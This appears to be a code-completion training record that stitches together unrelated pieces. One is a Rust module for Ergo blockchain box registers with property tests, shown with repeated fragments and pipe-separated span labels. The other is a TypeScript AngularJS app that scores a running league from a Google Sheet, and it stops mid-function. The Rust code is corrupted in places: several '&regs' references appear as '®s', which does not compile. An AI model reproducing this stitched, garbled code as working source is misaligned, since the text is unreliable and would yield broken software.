type Error = NonMandatoryRegistersError;
fn try_from(
value: HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>,
) -> Result<Self, Self::Error> {
let cm: HashMap<NonMandatoryRegisterId, RegisterValue> =
value.into_iter().map(|(k, v)| (k, v.into())).collect();
NonMandatoryRegisters::try_from(cm)
}
}
impl From<NonMandatoryRegistersError> for SigmaParsingError {
fn from(error: NonMandatoryRegistersError) -> Self {
SigmaParsingError::Misc(error.to_string())
}
}
#[allow(clippy::unwrap_used)]
#[cfg(feature = "arbitrary")]
pub(crate) mod arbitrary {
use super::*;
use proptest::{arbitrary::Arbitrary, collection::vec, prelude::*};
#[derive(Default)]
pub struct ArbNonMandatoryRegistersParams {
pub allow_unparseable: bool,
}
impl Arbitrary for NonMandatoryRegisters {
type Parameters = ArbNonMandatoryRegistersParams;
type Strategy = BoxedStrategy<Self>;
fn arbitrary_with(params: Self::Parameters) -> Self::Strategy {
vec(
if params.allow_unparseable {
prop_oneof![
any::<Constant>().prop_map(RegisterValue::Parsed),
vec(any::<u8>(), 0..100).prop_map({
|bytes| RegisterValue::Invalid {
bytes,
error_msg: "unparseable".to_string(),
}
})
]
.boxed()
} else {
any::<Constant>().prop_map(RegisterValue::Parsed).boxed()
},
0..=NonMandatoryRegisterId::NUM_REGS,
)
.prop_map(|reg_values| NonMandatoryRegisters::try_from(reg_values).unwrap())
.boxed()
}
}
}
#[allow(clippy::panic)]
#[allow(clippy::unwrap_used)]
#[allow(clippy::expect_used)]
#[cfg(test)]
mod tests {
use super::*;
use crate::serialization::sigma_serialize_roundtrip;
use proptest::prelude::*;
proptest! {
#[test]
fn hash_map_roundtrip(regs in any::<NonMandatoryRegisters>()) {
let hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = regs.clone().into();
let regs_from_map = NonMandatoryRegisters::try_from(hash_map);
prop_assert![regs_from_map.is_ok()];
prop_assert_eq![regs_from_map.unwrap(), regs];
}
#[test]
fn get(regs in any::<NonMandatoryRegisters>()) {
let hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = regs.clone().into();
hash_map.keys().try_for_each(|reg_id| {
prop_assert_eq![®s.get_constant(*reg_id).unwrap().unwrap(), hash_map.get(reg_id).unwrap().as_constant().unwrap()];
Ok(())
})?;
}
#[test]
fn reg_id_from_byte(reg_id_byte in 0i8..NonMandatoryRegisterId::END_INDEX as i8) {
assert!(RegisterId::try_from(reg_id_byte).is_ok());
}
#[test]
fn ser_roundtrip(regs in any::<NonMandatoryRegisters>()) {
prop_assert_eq![sigma_serialize_roundtrip(®s), regs];
}
}
#[test]
fn test_empty() {
assert!(NonMandatoryRegisters::empty().is_empty());
}
#[test]
fn test_non_densely_packed_error() {
let mut hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = HashMap::new();
let c: Constant = 1i32.into();
hash_map.insert(NonMandatoryRegisterId::R4, c.clone().into());
// gap, missing R5
hash_map.insert(NonMandatoryRegisterId::R6, c.into());
assert!(NonMandatoryRegisters::try_from(hash_map).is_err());
}
}
| {
NonMandatoryRegisters::try_from(
regs.into_iter()
.map(|(k, v)| (k, v.into()))
.collect::<HashMap<NonMandatoryRegisterId, RegisterValue>>(),
)
} | identifier_body |
register.rs | //! Box registers
use crate::mir::constant::Constant;
use crate::mir::expr::Expr;
use crate::serialization::sigma_byte_reader::SigmaByteRead;
use crate::serialization::sigma_byte_writer::SigmaByteWrite;
use crate::serialization::SigmaParsingError;
use crate::serialization::SigmaSerializable;
use crate::serialization::SigmaSerializationError;
use crate::serialization::SigmaSerializeResult;
use ergo_chain_types::Base16EncodedBytes;
use std::convert::TryInto;
use std::{collections::HashMap, convert::TryFrom};
use thiserror::Error;
mod id;
pub use id::*;
mod value;
pub use value::*;
/// Stores non-mandatory registers for the box
#[derive(PartialEq, Eq, Debug, Clone)]
#[cfg_attr(feature = "json", derive(serde::Serialize, serde::Deserialize))]
#[cfg_attr(
feature = "json",
serde(
into = "HashMap<NonMandatoryRegisterId, ergo_chain_types::Base16EncodedBytes>",
try_from = "HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>"
)
)]
pub struct NonMandatoryRegisters(Vec<RegisterValue>);
impl NonMandatoryRegisters {
/// Maximum number of non-mandatory registers
pub const MAX_SIZE: usize = NonMandatoryRegisterId::NUM_REGS;
/// Empty non-mandatory registers
pub fn empty() -> NonMandatoryRegisters {
NonMandatoryRegisters(vec![])
}
/// Create new from map
pub fn new(
regs: HashMap<NonMandatoryRegisterId, Constant>,
) -> Result<NonMandatoryRegisters, NonMandatoryRegistersError> {
NonMandatoryRegisters::try_from(
regs.into_iter()
.map(|(k, v)| (k, v.into()))
.collect::<HashMap<NonMandatoryRegisterId, RegisterValue>>(),
)
}
/// Size of non-mandatory registers set
pub fn len(&self) -> usize {
self.0.len()
}
/// Return true if non-mandatory registers set is empty
pub fn | (&self) -> bool {
self.0.is_empty()
}
/// Get register value (returns None, if there is no value for the given register id)
pub fn get(&self, reg_id: NonMandatoryRegisterId) -> Option<&RegisterValue> {
self.0.get(reg_id as usize)
}
/// Get register value as a Constant
/// returns None, if there is no value for the given register id or an error if it's an unparseable
pub fn get_constant(
&self,
reg_id: NonMandatoryRegisterId,
) -> Result<Option<Constant>, RegisterValueError> {
match self
.0
.get(reg_id as usize - NonMandatoryRegisterId::START_INDEX)
{
Some(rv) => match rv.as_constant() {
Ok(c) => Ok(Some(c.clone())),
Err(e) => Err(e),
},
None => Ok(None),
}
}
}
/// Create new from ordered values (first element will be R4, and so on)
impl TryFrom<Vec<RegisterValue>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(values: Vec<RegisterValue>) -> Result<Self, Self::Error> {
if values.len() > NonMandatoryRegisters::MAX_SIZE {
Err(NonMandatoryRegistersError::InvalidSize(values.len()))
} else {
Ok(NonMandatoryRegisters(values))
}
}
}
impl TryFrom<Vec<Constant>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(values: Vec<Constant>) -> Result<Self, Self::Error> {
NonMandatoryRegisters::try_from(
values
.into_iter()
.map(RegisterValue::Parsed)
.collect::<Vec<RegisterValue>>(),
)
}
}
impl SigmaSerializable for NonMandatoryRegisters {
fn sigma_serialize<W: SigmaByteWrite>(&self, w: &mut W) -> SigmaSerializeResult {
let regs_num = self.len();
w.put_u8(regs_num as u8)?;
for (idx, reg_value) in self.0.iter().enumerate() {
match reg_value {
RegisterValue::Parsed(c) => c.sigma_serialize(w)?,
RegisterValue::ParsedTupleExpr(t) => t.to_tuple_expr().sigma_serialize(w)?,
RegisterValue::Invalid { bytes, error_msg } => {
let bytes_str = base16::encode_lower(bytes);
return Err(SigmaSerializationError::NotSupported(format!("unparseable register value at {0:?} (parsing error: {error_msg}) cannot be serialized in the stream (writer), because it cannot be parsed later. Register value as base16-encoded bytes: {bytes_str}", NonMandatoryRegisterId::get_by_zero_index(idx))));
}
};
}
Ok(())
}
fn sigma_parse<R: SigmaByteRead>(r: &mut R) -> Result<Self, SigmaParsingError> {
let regs_num = r.get_u8()?;
let mut additional_regs = Vec::with_capacity(regs_num as usize);
for idx in 0..regs_num {
let expr = Expr::sigma_parse(r)?;
let reg_val = match expr {
Expr::Const(c) => RegisterValue::Parsed(c),
Expr::Tuple(t) => {
RegisterValue::ParsedTupleExpr(EvaluatedTuple::new(t).map_err(|e| {
RegisterValueError::UnexpectedRegisterValue(format!(
"error parsing tuple expression from register {0:?}: {e}",
RegisterId::try_from(idx)
))
})?)
}
_ => {
return Err(RegisterValueError::UnexpectedRegisterValue(format!(
"invalid register ({0:?}) value: {expr:?} (expected Constant or Tuple)",
RegisterId::try_from(idx)
))
.into())
}
};
additional_regs.push(reg_val);
}
Ok(additional_regs.try_into()?)
}
}
/// Possible errors when building NonMandatoryRegisters
#[derive(Error, PartialEq, Eq, Clone, Debug)]
pub enum NonMandatoryRegistersError {
/// Set of register has invalid size(maximum [`NonMandatoryRegisters::MAX_SIZE`])
#[error("invalid non-mandatory registers size ({0})")]
InvalidSize(usize),
/// Set of non-mandatory indexes are not densely packed
#[error("registers are not densely packed (register R{0} is missing)")]
NonDenselyPacked(u8),
}
impl From<NonMandatoryRegisters>
for HashMap<NonMandatoryRegisterId, ergo_chain_types::Base16EncodedBytes>
{
fn from(v: NonMandatoryRegisters) -> Self {
v.0.into_iter()
.enumerate()
.map(|(i, reg_value)| {
(
NonMandatoryRegisterId::get_by_zero_index(i),
// no way of returning an error without writing custom JSON serializer
#[allow(clippy::unwrap_used)]
Base16EncodedBytes::new(®_value.sigma_serialize_bytes()),
)
})
.collect()
}
}
impl From<NonMandatoryRegisters> for HashMap<NonMandatoryRegisterId, RegisterValue> {
fn from(v: NonMandatoryRegisters) -> Self {
v.0.into_iter()
.enumerate()
.map(|(i, reg_val)| (NonMandatoryRegisterId::get_by_zero_index(i), reg_val))
.collect()
}
}
impl TryFrom<HashMap<NonMandatoryRegisterId, RegisterValue>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(
reg_map: HashMap<NonMandatoryRegisterId, RegisterValue>,
) -> Result<Self, Self::Error> {
let regs_num = reg_map.len();
if regs_num > NonMandatoryRegisters::MAX_SIZE {
Err(NonMandatoryRegistersError::InvalidSize(regs_num))
} else {
let mut res: Vec<RegisterValue> = vec![];
NonMandatoryRegisterId::REG_IDS
.iter()
.take(regs_num)
.try_for_each(|reg_id| match reg_map.get(reg_id) {
Some(v) => Ok(res.push(v.clone())),
None => Err(NonMandatoryRegistersError::NonDenselyPacked(*reg_id as u8)),
})?;
Ok(NonMandatoryRegisters(res))
}
}
}
#[cfg(feature = "json")]
impl TryFrom<HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>>
for NonMandatoryRegisters
{
type Error = NonMandatoryRegistersError;
fn try_from(
value: HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>,
) -> Result<Self, Self::Error> {
let cm: HashMap<NonMandatoryRegisterId, RegisterValue> =
value.into_iter().map(|(k, v)| (k, v.into())).collect();
NonMandatoryRegisters::try_from(cm)
}
}
impl From<NonMandatoryRegistersError> for SigmaParsingError {
fn from(error: NonMandatoryRegistersError) -> Self {
SigmaParsingError::Misc(error.to_string())
}
}
#[allow(clippy::unwrap_used)]
#[cfg(feature = "arbitrary")]
pub(crate) mod arbitrary {
use super::*;
use proptest::{arbitrary::Arbitrary, collection::vec, prelude::*};
#[derive(Default)]
pub struct ArbNonMandatoryRegistersParams {
pub allow_unparseable: bool,
}
impl Arbitrary for NonMandatoryRegisters {
type Parameters = ArbNonMandatoryRegistersParams;
type Strategy = BoxedStrategy<Self>;
fn arbitrary_with(params: Self::Parameters) -> Self::Strategy {
vec(
if params.allow_unparseable {
prop_oneof![
any::<Constant>().prop_map(RegisterValue::Parsed),
vec(any::<u8>(), 0..100).prop_map({
|bytes| RegisterValue::Invalid {
bytes,
error_msg: "unparseable".to_string(),
}
})
]
.boxed()
} else {
any::<Constant>().prop_map(RegisterValue::Parsed).boxed()
},
0..=NonMandatoryRegisterId::NUM_REGS,
)
.prop_map(|reg_values| NonMandatoryRegisters::try_from(reg_values).unwrap())
.boxed()
}
}
}
#[allow(clippy::panic)]
#[allow(clippy::unwrap_used)]
#[allow(clippy::expect_used)]
#[cfg(test)]
mod tests {
use super::*;
use crate::serialization::sigma_serialize_roundtrip;
use proptest::prelude::*;
proptest! {
#[test]
fn hash_map_roundtrip(regs in any::<NonMandatoryRegisters>()) {
let hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = regs.clone().into();
let regs_from_map = NonMandatoryRegisters::try_from(hash_map);
prop_assert![regs_from_map.is_ok()];
prop_assert_eq![regs_from_map.unwrap(), regs];
}
#[test]
fn get(regs in any::<NonMandatoryRegisters>()) {
let hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = regs.clone().into();
hash_map.keys().try_for_each(|reg_id| {
prop_assert_eq![®s.get_constant(*reg_id).unwrap().unwrap(), hash_map.get(reg_id).unwrap().as_constant().unwrap()];
Ok(())
})?;
}
#[test]
fn reg_id_from_byte(reg_id_byte in 0i8..NonMandatoryRegisterId::END_INDEX as i8) {
assert!(RegisterId::try_from(reg_id_byte).is_ok());
}
#[test]
fn ser_roundtrip(regs in any::<NonMandatoryRegisters>()) {
prop_assert_eq![sigma_serialize_roundtrip(®s), regs];
}
}
#[test]
fn test_empty() {
assert!(NonMandatoryRegisters::empty().is_empty());
}
#[test]
fn test_non_densely_packed_error() {
let mut hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = HashMap::new();
let c: Constant = 1i32.into();
hash_map.insert(NonMandatoryRegisterId::R4, c.clone().into());
// gap, missing R5
hash_map.insert(NonMandatoryRegisterId::R6, c.into());
assert!(NonMandatoryRegisters::try_from(hash_map).is_err());
}
}
| is_empty | identifier_name |
mooseleague_ts.ts |
// to prevent this loading twice in dev - hacky hacky whatever shut your face
// if (!window['apploaded']) {
// window['apploaded'] = true;
// throw "Already loaded";
// }
declare var byx;
declare var lmw;
interface MEvent {
name: string;
url: string;
date: string|Date|moment.Moment;
state: string;
events: string;
link: string;
submit: string;
editLink: string;
displayDate: string;
live?: boolean;
days?: number;
hours?: number;
minutes?: number;
results: MEventRaceResults[];
}
interface MEventRaceResults {
race: string;
divisions: MDivisionRaceResult[];
times: MUserRaceResult[];
}
interface MUser {
user: string;
link: string;
age: number;
sex: Sex;
division: string;
results: MUserEventResult[];
}
interface MUserEventResult {
event: string;
times: MUserRaceResult[];
}
interface MUserRaceResult {
username: string;
race: string;
time: string;
time_number: number;
age_graded_time: string;
age_graded_time_number: number;
percent_world_record: number;
note: string;
sex: Sex;
links: MLink[];
place: number;
points: number;
division: string;
}
interface MDivision {
name: string;
users: Array<MUser>;
}
interface MDivisionRaceResult {
name: string;
race: string;
points: number;
athletes: number;
note: string;
place: number;
}
interface MLink {
type: string;
url: string;
favicon: string;
}
interface BreadCrumb {
name: string;
last: boolean;
link?: string;
}
let BASE = 'https://jgr3go.github.io/reddit_ar/mooseleague/';
if (window.location.href.match(/localhost/)) {
BASE = '';
}
let GAPI = new Promise((resolve, reject) => {
gapi.load('client', {
callback: async () => {
// this isn't great, but the apikey should be limited to very specific things
await gapi.client.init({apiKey: `${byx}1XThhfQZLh6YcTKwLz${lmw}`});
resolve();
}
});
});
function isMobile() {
return !!(navigator.userAgent.match(/Android/i) ||
navigator.userAgent.match(/webOS/i) ||
navigator.userAgent.match(/iPhone/i) ||
navigator.userAgent.match(/iPad/i) ||
navigator.userAgent.match(/iPod/i) ||
navigator.userAgent.match(/BlackBerry/i) ||
navigator.userAgent.match(/Windows Phone/i));
}
function stripDivision(div: string) {
if (div.includes("(")) {
return div.substr(0, div.indexOf("("));
}
return div;
}
/**
* Loads google sheet and does most of the processing into raw data objects
*/
class GoogleSvc {
private spreadsheet: gapi.client.sheets.Spreadsheet;
private Events: Array<MEvent> = [];
private Users: Array<MUser> = [];
private Divisions: Array<MDivision> = [];
private built: boolean = false;
private loading: Promise<any>;
public USER_COLUMNS = {
TIMESTAMP: 0,
USERNAME: 1,
DIVISION: 2,
AGE: 3,
SEX: 4,
RESULT: 5,
NOTES: 6,
LINKS: 7
};
private async ready() {
if (this.loading) { return await this.loading; }
this.loading = new Promise(async (resolve, reject) => {
try {
await GAPI;
await gapi.client.load('sheets', 'v4');
let sheet = await gapi.client.sheets.spreadsheets.get({
spreadsheetId: '1ZC7pDg9VRiqnd4-w15LUSWcvQXti62IOSp0dcYj2JZI',
includeGridData: true
});
console.log(sheet.result);
this.spreadsheet = sheet.result;
resolve();
} catch (e) {
reject(e);
}
});
}
async load() {
await this.getSpreadsheet();
}
private async getSpreadsheet(): Promise<gapi.client.sheets.Spreadsheet> {
if (this.spreadsheet) { return this.spreadsheet; }
await this.ready();
return this.spreadsheet;
}
private async build() {
if (this.built) { return; }
await this.getSpreadsheet();
this.buildEvents();
this.buildUsers();
this.buildDivisions();
this.mergeEventsUsers();
this.built = true;
}
private buildEvents() {
let events: MEvent[] = [];
for (let sheet of this.spreadsheet.sheets) {
let evt: MEvent = <MEvent>{};
evt.name = sheet.properties.title;
let data = sheet.data[0];
if (!data || !data.rowData) { continue; }
for (let row of data.rowData) {
if (!row.values || !row.values.length) { continue; }
if (!row.values[1]?.formattedValue) { continue; }
switch (row.values[0]?.formattedValue) {
case 'Event':
evt.events = row.values[1]?.formattedValue;
break;
case 'Date':
evt.date = moment(row.values[1]?.formattedValue).year(moment().year());
evt.displayDate = moment(evt.date).format('MMM D, YYYY');
break;
case 'Results':
evt.link = row.values[1]?.formattedValue;
break;
case 'Form':
evt.submit = row.values[1]?.formattedValue;
break;
default:
break;
}
evt.state = evt.name;
evt.url = `/${ evt.name.split(' ').join('').toLowerCase()}`;
evt.editLink = `${this.spreadsheet.spreadsheetUrl}#gid=${sheet.properties.sheetId}`;
evt.results = evt.events.split(',').map(e => {
return {
race: e,
divisions: [],
times: []
};
});
}
events.push(evt);
}
this.Events = events;
}
private buildUsers() {
let users: MUser[] = [];
let COL = this.USER_COLUMNS;
for (let sheet of this.spreadsheet.sheets) {
let eventName = sheet.properties.title;
let raceName: string;
let data = sheet.data[0];
if (!data || !data.rowData) { continue; }
let startUserRows = false;
for (let row of data.rowData) {
if (!row.values || !row.values.length) { continue; }
if (!startUserRows) {
if (row.values[0]?.formattedValue == 'Event') {
raceName = row.values[1]?.formattedValue;
}
if (row.values[COL.USERNAME]?.formattedValue == 'Username') {
startUserRows = true;
}
} else {
let username = row.values[COL.USERNAME]?.formattedValue || "";
if (!username) { break; }
// first time finding user, add to master list
if (!users.find(u => u.user.toLowerCase() == username.toLowerCase())) {
let user: Partial<MUser> = {
user: username,
division: stripDivision(row.values[COL.DIVISION]?.formattedValue || ""),
age: parseInt(row.values[COL.AGE]?.formattedValue) || null,
sex: <Sex>row.values[COL.SEX]?.formattedValue?.substr(0,1).toUpperCase(),
results: []
};
user.link = `https://reddit.com/u/${user.user}`;
users.push(<MUser>user);
}
let user = users.find(u => u.user.toLowerCase() == username.toLowerCase());
let time = row.values[COL.RESULT]?.formattedValue;
if (time?.substr(0, 1) == "'") {
time = time.substr(1);
}
user.results.push({
event: eventName,
times: raceName.split(',').map(r => {
return <MUserRaceResult>{
race: r,
username: user.user,
division: user.division,
sex: user.sex,
time: time,
note: row.values[COL.NOTES]?.formattedValue,
links: row.values[COL.LINKS]?.formattedValue?.split(',').map(link => {
return <MLink>{
type: this.getLinkType(link),
favicon: this.getFavicon(link),
url: link
}
})
};
})
});
}
}
}
this.Users = users;
}
private getLinkType(link: string) {
if (link.match(/strava/)) { return 'strava'; }
if (link.match(/youtu/)) { return 'youtube'; }
if (link.match(/redd/)) { return 'reddit'; }
return '';
}
private getFavicon(link: string) {
let match = link.match(/(https?\:\/\/[^\/]+)/);
if (!match) { return 'https://google.com/favicon.ico'; }
let root = match[1].trim();
if (root.substr(0, 4) != "http") {
root = `http://${root}`;
}
return `${root}/favicon.ico`;
}
private buildDivisions() {
let divisions: MDivision[] = [];
for (let user of this.Users) {
if (!divisions.find(d => d.name.toLowerCase() == user.division.toLowerCase())) {
divisions.push({
name: user.division,
users: []
});
}
let division = divisions.find(d => d.name.toLowerCase() == user.division.toLowerCase());
division.users.push(user);
}
}
private mergeEventsUsers() {
// first merge any events into the users
for (let evt of this.Events) {
for (let user of this.Users) {
// add DNS events to every user for events they didn't do
if (!user.results.find(r => r.event.toLowerCase() == evt.name.toLowerCase())) {
user.results.push({
event: evt.name,
times: evt.events.split(',').map(race => (<MUserRaceResult>{
race: race,
username: user.user,
division: user.division,
note: 'DNS'
}))
})
}
}
}
// then merge user results into the events
for (let user of this.Users) {
for (let result of user.results) {
let evt = this.Events.find(e => e.name.toLowerCase() == result.event.toLowerCase());
if (evt) {
for (let time of result.times) {
let evtResult = evt.results.find(r => r.race.toLowerCase() == time.race.toLowerCase());
evtResult.times.push(time);
if (!evtResult.divisions.find(d => d.race.toLowerCase() == time.race.toLowerCase()
&& d.name.toLowerCase() == time.division.toLowerCase()))
{
evtResult.divisions.push({
name: time.division,
race: time.race,
points: null,
athletes: 0,
note: null,
place: null
});
}
}
}
}
}
}
async listEvents(): Promise<MEvent[]> {
await this.build();
return this.Events;
}
async listUsers(): Promise<MUser[]> {
await this.build();
return this.Users;
}
async listDivisions(): Promise<MDivision[]> {
await this.build();
return this.Divisions;
}
}
/**
* Container for the events, logic for what's next etc
*/
class Events {
static $inject = ['$http', '$q', 'Google'];
private events: Array<MEvent> = [];
constructor(public $http: angular.IHttpService,
public $q: angular.IQService,
public google: GoogleSvc) { }
async list(): Promise<Array<MEvent>> {
if (this.events && this.events.length) |
this.events = await this.google.listEvents();
this.events = _.orderBy(this.events, e => e.date);
return this.events;
}
async get(eventName: string): Promise<MEvent> {
let events = await this.list();
return events.find(x => x.name.replace(/\s+/g, '').toLowerCase() == eventName.replace(/\s+/g, '').toLowerCase());
}
async latest() {
let events = await this.list();
if (events.length == 1) {
return events[0];
}
if (events[events.length- 2]) {
let date = moment(events[events.length - 2].date).format('YYYY-MM-DD');
if (moment().format('YYYY-MM-DD') == date) {
return events[events.length - 2];
}
}
return events[events.length - 1];
}
async next() {
let events = await this.list();
if (events.length == 1) {
return events[0];
}
let active = events.find(e => !!e.submit);
if (active) { return active; }
let next = events[events.length - 1];
for (let ii = events.length - 1; ii >= 0; ii--) {
if (moment(events[ii].date) >= moment().startOf('day')) {
next = events[ii];
}
}
return next;
}
}
/**
* Container for users, logic for age grading etc
*/
class Users {
users: MUser[] = [];
static $inject = ['Google', 'TimeService', 'AgeService'];
constructor(public google: GoogleSvc, public timeSvc: TimeService, public ageSvc: AgeService) {}
async list() {
if (this.users.length) { return this.users; }
this.users = await this.google.listUsers();
for (let user of this.users) {
for (let result of user.results) {
for (let time of result.times) {
time.time_number = this.timeSvc.toNumber(time.time);
time.age_graded_time_number = this.ageSvc.ageGrade(time.race, user.age, user.sex, time.time_number, user.user);
time.age_graded_time = this.timeSvc.toString(time.age_graded_time_number);
time.percent_world_record = this.ageSvc.percentGrade(time.race, user.sex, time.age_graded_time_number, user.user);
}
}
}
return this.users;
}
}
/**
* Container for divisions
*/
class Divisions {
divisions: MDivision[] = [];
static $inject = ['Google'];
constructor(private google: GoogleSvc) {}
async list() {
if (this.divisions.length) { return this.divisions; }
this.divisions = await this.google.listDivisions();
return this.divisions;
}
}
/**
* Does the bulk of the calculations for results, division grouping and scoring
*/
class Results {
results: MEvent[];
static $inject = ['Events', 'Users', 'Divisions'];
constructor(private Events: Events,
private Users: Users,
private Divisions: Divisions) {}
async calculate() {
if (this.results) { return this.results; }
let events = await this.Events.list();
let users = await this.Users.list();
let divisions = await this.Divisions.list();
this.score(events);
console.log({events})
this.results = events;
return this.results;
}
score(events: MEvent[]) {
for (let event of events) {
for (let race of event.results) {
let divs = _.keyBy(race.divisions, d => d.name.toLowerCase());
race.times = _.orderBy(race.times, [t => t.percent_world_record, t => t.time_number, t => t.username], ['desc', 'asc', 'asc']);
let place = 1;
for (let time of race.times) {
if (time.time) {
time.place = place++;
let divname = time.division.toLowerCase();
divs[divname].athletes += 1;
if (divs[divname].athletes <= 5) {
time.points = time.place;
divs[divname].points += time.place;
}
}
else {
time.points = null;
}
}
race.divisions = _.orderBy(race.divisions, [d => d.athletes >= 5 ? -1 : 1, d => d.points]);
place = 1;
for (let div of race.divisions) {
if (div.athletes >= 5) {
div.place = place++;
} else {
div.note = "DQ (Not enough finishers)";
}
}
}
}
}
async getEventResults(name: string) {
await this.calculate();
return this.results.find(x => x.name.replace(/\s+/g, '').toLowerCase() == name.replace(/\s+/g, '').toLowerCase());
}
}
/**
* Default page calendar view
*/
class Calendar {
static $inject = ['$http', 'Events'];
events: Array<MEvent> = [];
constructor (public $http: angular.IHttpService, public Events: Events) {
this.init();
}
async init() {
this.events = [];
let evts = await this.Events.list();
for (let evt of evts) {
evt = _.clone(evt);
evt.date = moment(evt.date).format('MMM D, YYYY');
this.events.push(evt);
}
}
}
/**
* Main controller loaded at start
*/
class MainController {
public isMobile: boolean;
public autoplay: boolean;
public events: Array<MEvent> = [];
public next: MEvent;
public autoplayKey: string;
public lastState: string;
public crumbs: BreadCrumb[] = [];
static $inject = ['$http', '$location', '$timeout', '$state', 'Events', '$sce'];
constructor(public $http: angular.IHttpService,
public $location: angular.ILocationService,
public $timeout: angular.ITimeoutService,
public $state: ng.ui.IStateService,
public Events: Events,
public $sce: angular.ISCEService)
{
this.autoplay = localStorage.getItem('autoplay2020') === null ? true : localStorage.getItem('autoplay2020') == 'true';
this.isMobile = isMobile();
this.autoplayKey = 'autoplay' + moment().year();
this.init();
}
async init() {
let [evts, evt] = await Promise.all([this.Events.list(), this.Events.next()]);
this.events = evts;
this.next = <MEvent>{
name: evt.name.toUpperCase(),
date: moment(evt.date),
state: evt.state,
displayDate: moment(evt.date).format('MMM D, YYYY'),
submit: evt.submit,
live: false
};
this.countdown();
}
countdown() {
if (this.next) {
let now = moment();
let evt = moment(this.next.date);
if (now.format('YYYY-MM-DD') === evt.format('YYYY-MM-DD')) {
this.next.live = true;
} else if (this.next.submit) {
this.next.live = true;
} else {
let days = evt.diff(now, 'days');
this.next.days = days;
evt.subtract(days, 'days');
let hours = evt.diff(now, 'hours');
this.next.hours = hours;
evt.subtract(hours, 'hours');
let minutes = evt.diff(now, 'minutes');
this.next.minutes = minutes;
}
this.$timeout(() => this.countdown(), 1000 * 60);
} else {
this.$timeout(() => this.countdown(), 500);
}
}
getBreadcrumbs() {
if (this.$state.current.name === this.lastState) {
return this.crumbs;
}
this.lastState = this.$state.current.name;
this.crumbs = [];
if (this.lastState !== 'Calendar') {
this.crumbs = [
{name: 'Home', last: false, link: 'Calendar'},
{name: this.lastState, last: true}
];
} else {
this.crumbs = [
{name: 'Home', last: true}
];
}
return this.crumbs;
}
stopAutoplay() {
localStorage.setItem(this.autoplayKey, 'false');
this.autoplay = false;
}
startAutoplay() {
localStorage.setItem(this.autoplayKey, 'true');
this.autoplay = true;
}
shouldAutoplay() {
let ap = localStorage.getItem(this.autoplayKey);
return !(ap === 'false');
}
getThemeUrl() {
let ap = this.shouldAutoplay();
return this.$sce.trustAsResourceUrl(`https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/460111206&auto_play=${ap}&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true`);
}
}
/**
* Individual event controller for event results pages
*/
class EventController {
tab: string = 'results';
hasRelay: boolean = false;
event: MEvent;
static $inject = ['$http', '$state', '$timeout', '$location', '$anchorScroll',
'$stateParams', 'Events', 'Results'];
constructor(private $http: angular.IHttpService,
private $state: ng.ui.IStateService,
private $timeout: angular.ITimeoutService,
private $location: angular.ILocationService,
private $anchorScroll: angular.IAnchorScrollService,
private $params: ng.ui.IStateParamsService,
private Events: Events,
private Results: Results)
{
this.$anchorScroll.yOffset = 60;
this.init();
}
async init() {
if (this.$params.tab) {
this.tab = this.$params.tab;
}
let eventName = this.$state.current.name;
this.event = await this.Results.getEventResults(eventName);
console.log({event: this.event});
this.$timeout(this.$anchorScroll);
}
changeTab(tab: string) {
this.tab = tab;
this.$state.go(this.$state.current.name, {tab});
}
}
/**
* AgeService
* Manages age grading calculations. Defaults to no grade.
*/
interface Grade {
id: string;
event: string;
isRoad: boolean;
mf: Sex;
age: number;
factor: number;
}
type Sex = 'F'|'M';
class AgeService {
static GRADES: {[mfEventId: string]: {[age: number]: Grade}} = {};
static COLS = {
MFEVENTID : 0,
EVENTID: 1,
ISROAD: 2,
DISTANCE_KM: 3,
WORLD_RECORD_SEC: 4,
AGE_START: 5
};
static WORLD_RECORD = 'World Record';
static parse(file: string) {
let COL = AgeService.COLS;
let lines = file.split('\n');
for (let line of lines) {
if (!line.trim()) { continue; }
let parts = line.split('\t');
if (parts[0] == 'Event') { continue; }
// set up base object
let grade: Partial<Grade> = {
event: parts[COL.EVENTID],
isRoad: parts[COL.ISROAD] == '1',
mf: <Sex>parts[COL.MFEVENTID].substr(0)
};
let id = parts[COL.MFEVENTID];
if (!AgeService.GRADES[id]) { AgeService.GRADES[id] = {}; }
// assign world record
AgeService.GRADES[id][AgeService.WORLD_RECORD] = <Grade>Object.assign({record: parseFloat(parts[COL.WORLD_RECORD_SEC])});
// assign age groups
let START = COL.AGE_START;
for (let ii = START; ii < parts.length - 1; ii++) {
let age = ii + 1;
let factor = parseFloat(parts[ii]);
AgeService.GRADES[id][age] = <Grade>Object.assign({age, factor, id}, grade);
}
}
console.log(AgeService.GRADES)
}
ageGrade(event: string, age: number, sex: Sex, seconds: number, username?: string): number {
if (!seconds) { return seconds; }
if (!sex) { sex = 'M'; }
event = event.replace(/\s/g, '');
let mfEventId = `${sex}${event}`;
let gradedTime = seconds;
let factor = 1;
if (AgeService.GRADES[mfEventId]) {
let mfEvent = AgeService.GRADES[mfEventId];
if (mfEvent[age]) {
factor = mfEvent[age].factor;
gradedTime = seconds * factor;
}
}
console.log(`${username} ${mfEventId} age:${age} time:${seconds} factor:${factor} graded:${gradedTime}`)
return gradedTime;
}
percentGrade(event: string, sex: Sex, seconds: number, username?: string): number {
if (!seconds) { return 0; }
if (!sex) { sex = 'M'; }
event = event.replace(/\s/g, '');
let percent = 0;
let wr;
let mfEventId = `${sex}${event}`;
if (AgeService.GRADES[mfEventId]) {
let mfEvent = AgeService.GRADES[mfEventId];
wr = mfEvent[AgeService.WORLD_RECORD];
percent = wr.record / seconds;
}
console.log(`${username} ${mfEventId} time:${seconds} WR:${wr?.record} percent:${percent}`);
return percent;
}
}
/**
* TimeService
* Time calculations -> string to number / number to string
*/
class TimeService {
toString(time: number): string {
if (!time) { return null; }
let hours = Math.floor(time / (60 * 60));
